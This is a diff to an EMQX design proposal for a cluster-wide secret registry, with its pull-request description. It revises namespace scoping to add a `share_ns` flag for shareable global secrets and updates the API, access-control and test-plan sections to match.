+### Allowing the placeholder in MQTT topics and payloads
+
+Considered: permit `$secret{...}` in rule republish topic / payload
+templates. Rejected: no compelling use case (the placeholder is for
+*outbound* credentials to backends, not for shaping MQTT-protocol
+content), and significant downside (audit logs of published
+messages would either need to special-case secrets or risk leaking).
+Easier to reject at config-validation time than to retrofit
+redaction across the MQTT logging path.

--- a/active/0038-secret-registry.md
+++ b/active/0038-secret-registry.md
@@ -7,6 +7,11 @@
 * 2026-07-23: @zmstone Drop cross-namespace secret sharing: reference implies
   disclosure, so secrets are reachable only within their own scope (namespace
   or global), with no fallback in either direction
+* 2026-07-24: @zmstone Reintroduce namespace→global sharing via a per-global
+  `share_ns` flag (default true): a namespaced reference falls back to a global
+  secret when that global secret is marked shareable. Global→namespace and
+  sibling-namespace resolution remain forbidden. `share_ns = false` keeps a
+  global secret tenant-invisible
 
 ## Abstract
 
@@ -32,19 +37,27 @@ never leaves the broker except as part of a rendered template at the
 moment the template is used.
 
 Secrets are scoped: a secret is owned by the scope of the principal
-that created it — a namespace, or global — and is reachable only from
-configurations running in that same scope. There is no cross-scope
-resolution in either direction: a namespace cannot reference a global
-or sibling-namespace secret, and a global configuration cannot
-reference a namespace's. This strictness is deliberate. Because a
-secret is resolved by rendering it into outbound bytes, and the
-principals who reference secrets are the same principals who choose
-where those bytes go, the ability to *reference* a secret is
-equivalent to the ability to *read* its value. The registry's
-no-read-back API therefore bounds exposure of secrets at rest (config
-dumps, backups, logs) but is not an access-control boundary between
-"can configure" and "can learn the value"; isolation is enforced
-purely by non-reachability across scopes.
+that created it — a namespace, or global. A namespaced reference
+resolves against its own namespace first, then falls back to a global
+secret **only if that global secret is marked shareable** (`share_ns`,
+default true). A global secret with `share_ns = false`, and every
+namespace's own secrets, stay private to their scope. A global
+configuration never resolves a namespace's secret, and one namespace
+never resolves another's — so the single cross-scope path is
+namespace→shareable-global, and it runs one way.
+
+This shape follows from one observation. Because a secret is resolved
+by rendering it into outbound bytes, and the principals who reference
+secrets are the same principals who choose where those bytes go, the
+ability to *reference* a secret is equivalent to the ability to *read*
+its value. Marking a global secret shareable is therefore a deliberate
+decision to disclose its value to every namespace's administrators;
+`share_ns = false` is how a global secret is kept tenant-invisible.
+The no-read-back API bounds exposure of secrets at rest (config dumps,
+backups, logs) but is not an access-control boundary between "can
+configure" and "can learn the value"; cross-scope isolation is
+enforced by non-reachability, which `share_ns = true` deliberately
+opens for a single global secret at a time.
 
 ## Motivation
 
@@ -93,9 +106,10 @@ This proposal targets EMQX v7.
 
 A new application `emqx_secret_registry` under `apps/` provides:
 
-* A cluster-wide mnesia / mria table storing `{name, value, metadata}`
-  triples. Replicated to all nodes via the same shard mechanism used
-  by existing config tables.
+* A cluster-wide mnesia / mria table storing
+  `#emqx_secret{{Scope, Name}, Value, ...metadata...}` rows (see
+  "Storage shape"). Replicated to all nodes via the same shard
+  mechanism used by existing config tables.
 * An HTTP API under `/api/v5/secrets/...` for create,
   list, update (by overwrite), delete, and get-metadata. **The value
   field is never returned by the API.** Read-back returns metadata
@@ -115,25 +129,30 @@ Record:
 
 ```
 {emqx_secret,
-   key         :: {?global_ns | binary(), binary()},  %% {OwnerNs, Name}
+   key         :: {?global_ns | binary(), binary()},  %% {Scope, Name}
    value       :: binary(),      %% raw bytes, UTF-8 well-formed
+   share_ns    :: boolean(),     %% global secret reachable from namespaces? default true
    description :: binary(),      %% operator-supplied free-form note, optional
    created_at  :: integer(),     %% monotonic millis
-   updated_at  :: integer()      %% monotonic millis
+   updated_at  :: integer(),     %% monotonic millis
+   extra       :: map()          %% reserved for forward-compatible fields
 }
 ```
 
 The owning scope (`?global_ns` or a namespace) is the first element
-of the key. A secret is reachable only from configurations running in
-its owning scope; there is no cross-scope resolution (see "Namespace
-scoping and isolation" below), so no per-secret sharing attribute is
-needed.
+of the key. `share_ns` governs whether a **global** secret is
+reachable from namespaces by fallback (default `true`); it has no
+effect on a namespace-owned secret, which is never shared into a
+narrower scope. `extra` is an empty map reserved so later versions can
+add fields without a schema migration. See "Resolution" and
+"Namespace scoping and isolation" below.
 
-The primary key is the `{OwnerNs, Name}` pair, following the v2
+The primary key is the `{Scope, Name}` pair, following the v2
 topic-metrics precedent (`emqx_topic_metrics_mria`, keyed
 `{'_' | global | binary(), '_' | binary()}`). Names are unique
-*within* a namespace, not cluster-wide. See "Namespace scoping"
-below.
+*within* a scope, not cluster-wide — a namespace and the global scope
+may each hold a secret named `prod_token`, and the namespace's own
+shadows the global one for that namespace (see "Resolution").
 
 Constraints:
 
@@ -384,23 +403,30 @@ introduced on release-60 (`emqx_mgmt_auth:check_scopes/2`).
 Endpoints:
 
 * `POST /api/v5/secrets`
-  body: `{ "name": "...", "value": "...", "description": "..." }`
+  body: `{ "name": "...", "value": "...", "description": "...",
+  "share_ns": true }`
   Creates a new secret in the caller's scope. Errors on name
-  collision within that scope.
+  collision within that scope. `share_ns` is accepted only for global
+  secrets (defaults to `true`); it is rejected for a namespaced
+  create.
 * `GET /api/v5/secrets`
-  Returns a paginated list of `{ name, description, scope,
+  Returns a paginated list of `{ name, description, scope, share_ns,
   created_at, updated_at }`, where `scope` is `global` or the owning
-  namespace. **The value is never returned.** The list contains only
-  the caller's own scope; other scopes' secrets are omitted (see
-  "API surface" under Namespace scoping).
+  namespace. **The value is never returned.** A namespaced caller's
+  list is their own namespace's rows plus the shareable global rows
+  (flagged inherited / read-only); non-shareable globals and other
+  namespaces' rows are omitted (see "API surface" under Namespace
+  scoping).
 * `GET /api/v5/secrets/{name}`
-  Returns `{ name, description, scope, created_at, updated_at }`.
-  **The value is never returned.** A request for a name outside the
-  caller's scope returns `404`, indistinguishable from a nonexistent
-  name.
+  Returns `{ name, description, scope, share_ns, created_at,
+  updated_at }`. **The value is never returned.** A request for a name
+  the caller cannot reference returns `404`, indistinguishable from a
+  nonexistent name.
 * `PUT /api/v5/secrets/{name}`
-  body: `{ "value": "...", "description": "..." }`
-  Overwrites the existing secret. This is the rotation path.
+  body: `{ "value": "...", "description": "...", "share_ns": true }`
+  Overwrites the existing secret; `share_ns` may be toggled here for a
+  global secret. This is the rotation path. Only the owning scope may
+  call it — a namespaced admin cannot `PUT` a shareable global.
 * `DELETE /api/v5/secrets/{name}`
   Removes the secret. The renderer's strict-fail behavior applies to
   any subsequent template render that references the deleted name.
@@ -514,43 +540,69 @@ does not claim otherwise.
 
 The one boundary that *is* real is the negative one: a secret a
 principal **cannot reference** is a secret that principal cannot
-exfiltrate. Cross-scope isolation is therefore built entirely on
-*non-reachability*, not on any view gate.
+exfiltrate. Cross-scope isolation is therefore built on
+*non-reachability*, not on any view gate — with exactly one deliberate
+opening: a global secret marked `share_ns = true` is made
+referenceable from every namespace, i.e. its value is intentionally
+disclosed to all tenant administrators. Everything else — global
+secrets with `share_ns = false`, every namespace's own secrets, and
+all sibling-namespace pairs — remains mutually non-reachable.
 
-#### Resolution: strictly within one scope, no fallback
+#### Resolution: own scope first, then a shareable global
 
-Each secret belongs to exactly one scope — a namespace, or global —
-and is reachable only from configurations running in that same scope:
+Each secret belongs to exactly one scope — a namespace, or global. A
+reference (`$secret{N}`, `get_secret('N')`, `secret://N`) is resolved
+relative to the scope of the *configuration that contains it* (see
+"The resolving scope is the configuration's, not the client's"):
 
-* A reference (`$secret{N}`, `get_secret('N')`, `secret://N`)
-  evaluated in namespace `NS` resolves `{NS, N}` **only**.
-* A reference evaluated in the global scope resolves
-  `{?global_ns, N}` **only**.
-* On miss — including a name that exists only in a *different* scope —
-  the strict-fail behavior described earlier applies
+* A reference evaluated in namespace `NS` resolves `{NS, N}` first.
+  On a hit the namespace's own secret is used — a namespace-owned
+  secret **shadows** a global one of the same name.
+* On a miss, resolution falls back to `{?global_ns, N}` **only if
+  that global secret is marked `share_ns = true`** (the default). A
+  global secret with `share_ns = false` is invisible to the fallback,
+  exactly as if it did not exist.
+* A reference evaluated in the **global** scope resolves
+  `{?global_ns, N}` **only** — there is no global→namespace fallback.
+* On a final miss the strict-fail behavior described earlier applies
   (`{error, {unknown_secret, Name}}`). The failure is identical
-  whether the name is unknown or merely out-of-scope, so a tenant
-  cannot probe for the existence of another scope's names.
+  whether the name is unknown, out of scope, or a non-shareable
+  global, so a tenant cannot probe for the existence or shareability
+  of names it cannot reach.
 
-There is no namespace→global fallback and no global→namespace
-fallback. Because reference implies disclosure, a fallback that let a
-tenant reference a global secret would be exactly a grant of that
-secret's value to the tenant; a fallback the other direction would
-let a tenant feed a value into a broker-wide code path. Both are the
-isolation breaks we are avoiding, so neither direction exists. No
-qualified `global::<name>` / `secret://global/<name>` cross-scope
-form is provided either — there is no reachable target outside the
-caller's own scope to name.
+This is the only cross-scope path in the design, and it runs one way:
+a namespace may inherit a **shareable global** secret; nothing else
+crosses a scope boundary. A namespace never resolves another
+namespace's secret, and a global configuration never resolves a
+namespace's.
 
-The consequence is deliberate: a credential that must be used from
-both a global configuration and a tenant's configuration is stored
-**once per scope** that uses it. Rotating such a genuinely-common
-credential is therefore per-scope — an N-touch operation across the
-scopes that hold a copy. This is the accepted v1 trade-off for an
-isolation model that is provably simple: one scope, one set of
-reachable secrets, no cross-scope reference anywhere. Targeted
-cross-scope sharing — with its "sharing = disclosing" semantics made
-explicit — is left to a future version; see "Declined alternatives."
+**Why a fallback, and why default-shareable.** The common operational
+case is a single backend credential used by both a global pipeline
+and one or more tenants' pipelines — e.g. a multi-tenant target
+system whose API key authenticates a global authn hook *and* is
+required by each namespace's message-forwarding action (the review
+scenario that prompted this revision). Without fallback, every
+namespace admin has to be handed a copy of that credential to store
+in their own namespace; rotation then becomes N-touch across
+namespaces, and — because referencing a secret already discloses its
+value — those copies grant the tenant admins nothing they would not
+already obtain by referencing a single shared original. Fallback
+removes the copy sprawl without changing who can read the value.
+Default `true` optimizes for that common case; `share_ns = false` is
+the explicit opt-out for a global secret that must stay invisible to
+tenants (the "secret hidden from namespace users" case raised in
+review).
+
+**The security cost, stated plainly.** Because reference implies
+disclosure, `share_ns = true` on a global secret discloses its value
+to the administrators of **every** namespace — any of them can
+reference it (its name is listed to them, not guessed; see "API
+surface") in a resource they control and render it out. Mark a global
+secret shareable only when disclosure to all tenants is acceptable.
+This is a coarse, all-namespaces switch; a *targeted* "share to these
+namespaces only" grant is a possible future refinement, and
+`share_ns` is its all-or-nothing zero case (see "Declined
+alternatives").
 
 #### The resolving scope is the configuration's, not the client's
 
@@ -571,12 +623,16 @@ Resolution keys off the **authenticator's / authz source's own
 scope**, which is known from that resource's configuration:
 
 * A **namespaced** authenticator (configured under namespace `NS`)
-  resolves its `$secret{...}` references against `{NS, _}`, even
-  though the connecting client is still in the unresolved/global
-  scope. This is *not* a global→namespace fallback: the reference is
-  owned by a namespaced configuration, so it resolves in that
-  namespace by the ordinary rule above. A client being pre-`tns` does
-  not downgrade the authenticator's scope to global.
+  resolves its `$secret{...}` references against `{NS, _}` first, then
+  falls back to a shareable global `{?global_ns, _}` by the ordinary
+  rule above — even though the connecting client is still in the
+  unresolved/global scope. This is *not* a global→namespace fallback:
+  the reference is owned by a namespaced configuration and resolves in
+  that namespace's context (which legitimately includes shareable
+  globals). A client being pre-`tns` does not downgrade the
+  authenticator's scope to global. This is exactly the review scenario
+  — a global API key, shared, reached from a namespaced authn hook and
+  a namespaced forwarding action alike, stored once.
 * A **global** authenticator resolves against `{?global_ns, _}`.
 
 The implementation must take the resolving namespace from the
@@ -625,30 +681,39 @@ The endpoints described above gain the standard namespace plumbing:
 * A `?SECRETS_API` clause in `emqx_dashboard_rbac:do_check_rbac/3`.
   Without it the catch-all denies namespaced admins outright.
 
-One caveat has to be recorded explicitly. `do_check_rbac/3` currently
-contains a blanket clause allowing **any** `GET` for a namespaced
-superuser, on the documented rationale that "namespaces are mostly to
-avoid accidentally mutating the wrong resources rather than hiding
-information." For this feature that rationale does not hold: a
-namespaced admin must not be able to enumerate another scope's secret
-*names*, since names are chosen by operators and routinely describe
-the system they unlock. The secrets API therefore filters list / get
-results **in the handler**, not relying on the RBAC layer. A caller
-whose `resolved_ns` is a namespace `NS` sees exactly the rows owned by
-`NS`; every other row — global secrets and other namespaces' secrets
-alike — is omitted from lists and returns `404` on direct `GET`. A
-global admin (optionally scoped via `?ns=`) sees exactly the rows of
-the scope they are acting in.
+**Read visibility follows reachability.** A caller may list / GET
+exactly the secrets it can *reference*, and no others:
 
-Create / update / delete are restricted to rows the caller owns
-(`resolved_ns`), so a namespaced admin can only manage their own
-namespace's secrets and a global admin only global (or, via `?ns=`, a
-named namespace's) secrets. No principal can reach across scopes.
+* A namespaced admin (`resolved_ns = NS`) sees the rows owned by `NS`
+  **plus the shareable global rows** (`{global, _}` with
+  `share_ns = true`), the latter flagged as inherited and read-only.
+  Global secrets with `share_ns = false` and every other namespace's
+  rows are omitted from lists and return `404` on direct `GET`.
+* A global admin sees the global rows (or, via `?ns=`, that
+  namespace's rows).
 
-Values are never returned by any endpoint regardless of scope. As
-"Security model" notes, this bounds at-rest exposure but is not the
-isolation boundary; the isolation boundary is that a scope can neither
-reference nor enumerate any secret outside itself.
+Aligning list-visibility with reference-reachability is deliberate:
+since a shareable global is already readable-by-reference from a
+namespace, hiding its *name* there would be theater, and surfacing it
+lets a tenant admin discover what they may reference. A non-shareable
+global is unreachable, so its name is withheld.
+
+**Write is own-scope only.** Create / update / delete are restricted
+to rows the caller owns (`resolved_ns`): a namespaced admin manages
+only their own namespace's secrets, a global admin only global (or,
+via `?ns=`, a named namespace's) secrets. A namespaced admin can
+*reference and read* a shareable global but cannot modify or delete
+it. `share_ns` itself is settable only on a global secret, by a global
+admin.
+
+On `do_check_rbac/3`: it currently allows **any** `GET` for a
+namespaced superuser, on the rationale that "namespaces mostly guard
+against accidental mutation, not information disclosure." The
+reachability-based filtering above is enforced in the secrets handler,
+not by extending that clause; the broad `GET` allowance is a
+pre-existing, registry-independent concern, and tightening it is out
+of scope for this EIP. Values are never returned by any endpoint
+regardless of scope.
 
 #### Namespace deletion
 
@@ -724,33 +789,43 @@ required template variables in HTTP bridges.
   contains no secret values; `data import` rejects archives
   containing a secrets table when the cluster already has secrets.
 * Namespace tests -- the isolation-critical class:
-  * A namespaced config resolves a bare name to its own namespace's
-    secret; the same name existing only in the global scope (or in a
-    sibling namespace) is **not** resolved and strict-fails, with a
-    failure indistinguishable from a nonexistent name. This is the
-    value-exfiltration test: a tenant bridge referencing a global name
-    must never render that value onto the wire.
+  * Own-scope hit: a namespaced config resolves a bare name to its
+    own namespace's secret when one exists, shadowing a same-named
+    global.
+  * Shareable-global fallback: a namespaced config that misses locally
+    resolves a global secret with `share_ns = true` and renders it.
+  * Non-shareable global is invisible: the same miss against a global
+    with `share_ns = false` strict-fails, with a failure
+    indistinguishable from a nonexistent name. This is the
+    value-exfiltration test — a tenant bridge referencing a
+    non-shared global name must never render that value onto the wire.
+  * Sibling isolation: a namespaced config never resolves another
+    namespace's secret, even by the same name.
   * A global config resolves only global secrets and never a
     namespace-owned secret, even when the name exists only in a
     namespace.
-  * No cross-scope qualified form exists: `$secret{global::name}` /
-    `secret://global/name` from a namespaced context do not resolve
-    (they are treated as an unknown name or a config-validation
-    error, per implementation choice — assert whichever is chosen).
+  * Toggling `share_ns` from `true` to `false` on a global secret
+    makes a previously-resolving namespaced reference strict-fail on
+    its next render.
   * Authn scoping: a **namespaced** HTTP authenticator resolves its
-    `$secret{...}` against its own namespace even though the
-    connecting client has no `tns` yet (and even when the client's
-    `tns` is initialized *from* this authentication). A **global**
-    authenticator resolves against global. A regression that keys
-    resolution off the client's unresolved `tns` must fail this test.
-  * A namespaced admin cannot create, read, update, delete, or
-    **list** another scope's secrets (another namespace's *or* the
-    global scope's); a global admin can act on any namespace via
-    `?ns=`.
+    `$secret{...}` against its own namespace (then a shareable global)
+    even though the connecting client has no `tns` yet — and even when
+    the client's `tns` is initialized *from* this authentication. A
+    **global** authenticator resolves against global. A regression
+    that keys resolution off the client's unresolved `tns` must fail
+    this test.
+  * Read visibility: a namespaced admin's list contains their own
+    rows plus shareable globals (flagged inherited), and omits
+    non-shareable globals and sibling namespaces; direct `GET` of a
+    hidden name returns `404`. A global admin can act on any namespace
+    via `?ns=`.
+  * Write is own-scope: a namespaced admin cannot create, update, or
+    delete a global secret (including a shareable one they can read),
+    nor any other namespace's secret.
   * Per-namespace cap is enforced per namespace, not cluster-wide.
   * `'namespace.delete'` removes exactly that namespace's secrets and
-    leaves global and sibling-namespace ones intact; re-running the
-    cleanup is a no-op.
+    leaves global (including shareable) and sibling-namespace ones
+    intact; re-running the cleanup is a no-op.
 * HTTP-header byte check composition: a stored secret whose value
   contains CR / LF is accepted at storage time (UTF-8-only check
   passes), but rejected at the HTTP bridge connector when used as a
@@ -820,43 +895,45 @@ only through the referencing paths that already carry it. Rotation is
 the rotation path; an operator who needs the value elsewhere should
 store their own copy.
 
-### Cross-namespace secret sharing (fallback, `shared_ns` flag, or allowlist)
+### Cross-scope sharing — the shape adopted, and the ones declined
 
-Considered, across several shapes and the subject of the review that
-prompted this revision:
+The design adopts exactly one cross-scope path: a namespaced reference
+may fall back to a **global** secret marked `share_ns = true` (see
+"Resolution"). The load-bearing observation throughout is that
+**referencing a secret is equivalent to reading its value** (see
+"Security model: reference implies disclosure") — a tenant who can
+reference a secret in a resource they control can render it to an
+endpoint they control and read it off the wire. So `share_ns = true`
+is *not* a "reference but not read" grant — no such thing exists — but
+an explicit decision to disclose a global secret's value to every
+namespace administrator. Several richer or different shapes were
+considered and declined for v1:
 
-1. **Implicit fallback** — a namespaced reference to name `N` that
-   misses locally falls back to the global `N`. This was the shape of
-   an earlier draft.
-2. **Opt-in `shared_ns` flag** — a global secret is reachable from
-   namespaces only when a global admin marks it shared.
-3. **Per-namespace allowlist** — a global secret carries the list of
-   namespaces it is offered to.
-
-All three are rejected for v1, on one root observation: **referencing
-a secret is equivalent to reading its value** (see "Security model:
-reference implies disclosure"). A tenant who can reference a secret in
-a resource they control can render it to an endpoint they control and
-read it off the wire. So any mechanism that lets a namespace reference
-a global secret is, precisely, a mechanism that discloses that
-secret's value to the namespace's administrators — regardless of the
-no-read-back API.
-
-That reframes the design question from "how do we let tenants
-*reference but not read* a shared secret" (which is impossible) to
-"do we want a way to *disclose* a global credential to specific
-tenants." For v1 the answer is no: cross-scope reference does not
-exist in any form. Shape 1 is the most dangerous (silent, name-guess
-exfiltration) and is out. Shape 2's `shared_ns` reads as a
-view-protection but is really an all-tenants disclosure switch — its
-name over-promises, so we do not ship it. Shape 3 is the *honest*
-form of the feature (targeted disclosure) but adds a cross-namespace
-ACL surface that must stay consistent across namespace lifecycle, for
-a use case ("one credential shared to some tenants, rotated once")
-that has not yet been asked for. If that need materializes, shape 3
-is the way to add it later — as an explicit *disclosure* grant, named
-and documented as such — without invalidating stored data (the
-strict-scope model is its zero case).
+1. **Namespace→global fallback with no opt-out** — the shape of an
+   earlier draft: any namespaced miss falls through to global
+   unconditionally. Rejected because it offers no way to keep a global
+   secret tenant-invisible; a name-guess from any namespace would
+   exfiltrate any global secret. `share_ns` (default `true`) keeps the
+   convenient default while restoring that control — a global secret
+   that must not be disclosed to tenants is marked `share_ns = false`,
+   at which point it is unreachable from and unlisted to every
+   namespace.
+2. **Per-namespace allowlist** — a global secret carries the list of
+   namespaces it is offered to ("share to these tenants only"). This
+   is the *honest, targeted* form of disclosure and the natural
+   successor to the coarse `share_ns` boolean, but it adds a
+   cross-namespace ACL that must stay consistent across namespace
+   lifecycle, for a use case ("one credential shared to some tenants,
+   rotated once") not yet asked for. Deferred; `share_ns = true` is
+   its all-or-nothing zero case and forward-compatible with it (a
+   future allowlist can treat `share_ns = true` as "all namespaces"),
+   so shipping the boolean now does not invalidate stored data later.
+3. **Global→namespace and sibling-namespace resolution.** Rejected
+   outright, in any version. Letting a global configuration resolve a
+   namespace's secret would feed a tenant-controlled value into a
+   broker-wide code path; letting one namespace resolve another's
+   breaks tenant isolation with no use case. Only namespace→global
+   (shareable) crosses a boundary.
 
 ### Allowing the placeholder in MQTT topics and payloads
 


### PR DESCRIPTION
Introduces a cluster-wide secret registry application that stores named byte strings, exposes a management HTTP API gated under the existing `data_integration` API-key scope, and surfaces values to consumers through three access paths matched to the shape of each consumer:

- `$secret{<name>}` placeholder for template-rendered output (HTTP bridge headers / URLs / bodies, authn / authz HTTP request templates) — log-channel-safe; the placeholder is preserved verbatim in every trace / debug path while the wire sees the substituted value.
- `get_secret('<name>')` rule SQL function as an escape hatch for cases where the secret value must participate in a SQL expression (HMAC signing, multi-input composition). Documented to leak through rule trace output when tracing is enabled — used sparingly.
- `secret://<name>` URI for HOCON secret-typed fields (action / source / connector passwords and API tokens). Slots into the existing `emqx_schema_secret` / `emqx_secret_loader` / `emqx_utils_redact` plumbing as a parallel clause to `file://`.

Targets EMQX v7.

Read-back via the management API returns metadata only — the stored byte string never leaves the broker except through one of the three resolution paths above. Backup / export excludes the registry by default.

Non-goals for v1: encryption at rest with broker-managed master key (defer to filesystem encryption), external secret-broker integration (Vault, AWS Secrets Manager), and automatic rotation / TTL.

Declined alternatives documented in the EIP: rule function as the only access surface, encryption at rest, external broker integration, returning the value via GET, TTL / auto-rotation, and allowing the placeholder in MQTT topics / payloads.